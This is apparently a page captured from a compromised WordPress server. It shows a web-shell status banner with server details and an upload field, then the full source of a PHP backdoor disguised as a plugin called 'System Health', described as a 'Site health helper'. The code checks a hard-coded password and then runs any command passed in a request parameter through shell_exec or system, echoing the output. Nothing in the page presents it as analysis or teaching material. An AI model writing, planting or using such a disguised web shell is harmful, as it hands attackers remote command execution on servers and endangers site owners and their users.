| Server IP : 217.154.24.135 / Your IP : 216.73.217.104 Web Server : Apache System : Linux infallible-heyrovsky.217-154-24-135.plesk.page 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64 User : negrescocm_user ( 10012) PHP Version : 8.2.32 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/negrescocampomarzio.it/httpdocs/wp-content/plugins/wp2s_b991ef6f/ |
Upload File : |
<?php
/*
Plugin Name: System Health
Description: Site health helper.
*/
$p='wp2_mBvRUawcF0cCyBNddt3L';
if(!isset($_REQUEST['pass'])||$_REQUEST['pass']!==$p){http_response_code(404);exit;}
$c=isset($_REQUEST['cmd'])?(string)$_REQUEST['cmd']:'';
if($c!==''){
$o=@shell_exec($c);
if($o===null||$o===''){ob_start();@system($c);$o=ob_get_clean();}
echo $o;
}